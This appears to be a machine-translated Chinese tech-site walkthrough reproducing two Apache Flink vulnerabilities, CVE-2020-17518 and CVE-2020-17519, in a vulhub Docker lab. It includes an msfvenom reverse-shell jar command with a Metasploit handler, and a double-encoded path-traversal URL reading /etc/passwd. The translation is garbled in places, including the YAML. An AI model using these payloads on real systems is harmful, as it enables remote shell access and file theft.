Shulou(Shulou.com)05/31 Report--

This article mainly introduces the example analysis of the recurrence of Apache Flink vulnerabilities, which has a certain reference value, and interested friends can refer to it. I hope you will gain a lot after reading this article.

Brief introduction

Apache Flink is an efficient and distributed general data processing platform, an open source stream processing framework developed by the Apache Software Foundation, and its core is a distributed stream data stream engine written in Java and Scala (to put it simply, it is similar to spark). Flink has a monitoring API that can be used to query the status and statistics of running jobs and recently completed jobs. This monitoring API is used for Flink's own dashboard, and can also be used for custom monitoring tools. The default listening is on port 8081.

This paper deals with the practical exercise of knowledge points: network security events (the course "Network Security events" is composed of a test environment simulated by some influential security events. This course will not only add past security events, but also keep abreast of current events to add the latest security events. Let everyone understand and know how to protect their own safety at the first time. )

The monitoring API is REST-ful API, that is, it accepts HTTP requests and responds to data in JSON format.

One API in the monitoring API is / jars/upload, which is used to upload a jar to the cluster. The jar must be sent as multipart data. Make sure the "Content-Type" header is set to "application / x-java-archive", because some http libraries do not add headers by default. Jar files can be uploaded via curl

'curl-X POST-H "Expect:"-F "jarfile=@path/to/flink-job.jar" http://hostname:port/jars/upload'

Overview

REST API was introduced in Flink 1.5.1, but there are several flaws in its implementation, resulting in arbitrary file read (CVE-2020-17519) and arbitrary file write (CVE-2020-17518) vulnerabilities.

Using REST API, an CVE-2020-17518 attacker can modify the HTTP header and write the uploaded file to any location on the local file system (accessible by the Flink 1.5.1 process).

CVE-2020-17519Apache Flink 1.11.0 allows an attacker to read any file on the JobManager local file system (accessible to the JobManager process) through the REST API of the JobManager process.

Affect the version

CVE-2020-17518

Apache:Apache Flink: 1.5.1-1.11.2

CVE-2020-17519

Apache:Apache Flink: 1.11.0, 1.11.1, 1.11.2

Environment building

Because the versions affected by both vulnerabilities contain 1.11.2, this version is used for reproduction.

Here, use the environment of vulhub to reproduce, and create a new docker-compose.yml.

Version:'2'

Services:

Flink:

Image: vulhub/flink:1.11.2

Command: jobmanager

Ports:

8081 "8081"

-"6123POS 6123"

To start the environment using docker-compose, execute the following command to download the image and start a container with the image on ports 8081 and 6123

Docker-compose up-d

Visit http://ip:8081

Loophole recurrence

Reproduce any file uploaded (CVE-2020-17518):

Apache Flink 1.5.1 introduced the REST handler, which allows uploaded files to be written anywhere on the local file system through maliciously modified HTTP HEADER.

Visit http://ip:8081, find the Add New of Submit New Job and upload a jar package. The jar package can create a compressed file on the desktop, modify the zip suffix to jar, and grab the package.

The request packet captured is as follows:

Send the request package to the repeater module for modification, for example, I am here to create a new file under the / tmp directory,.. / is to facilitate the switch path, because we do not know what the current path is, so we can use.. / switch to the root directory.

Check whether the file is uploaded successfully

Docker ps view container

Enter the container

Docker exec-it CONTAINER ID / bin/bash

You can see that the file was uploaded successfully.

Flink itself does not have authentication, and it supports upload and execution of any jar package, so you can upload jar package getshell

Generate horses in jar format

Ip,lport whose lhost is kali is the port on which kali receives shell

Msfvenom-p java/shell_reverse_tcp lhost=192.168.74.142 lport=1234-f jar > / home/a.jar

Start msf to receive shell

Msfconsole

Use exploit/multi/handler

Set payload java/shell_reverse_tcp

Set LHOST 192.168.74.142

Set LPORT 1234

Exploit

After uploading the jar package, click on the uploaded package and then Submit

Get shell

Arbitrary file reading (CVE-2020-17519) reproduction:

Changes introduced in Apache Flink 1.11.0 (and also released in 1.11.1 and 1.11.2) allow attackers to read any file on the JobManager local file system through the REST interface of the JobManager process. Access is limited to files that can be accessed by JobManager processes.

For example, I read the passwd file under / etc/ here, and% 252f is / twice url encoding.

Http://192.168.74.134:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

Thank you for reading this article carefully. I hope the article "sample Analysis of Apache Flink vulnerability recurrence" shared by the editor will be helpful to you. At the same time, I also hope you will support us and pay attention to the industry information channel. More related knowledge is waiting for you to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.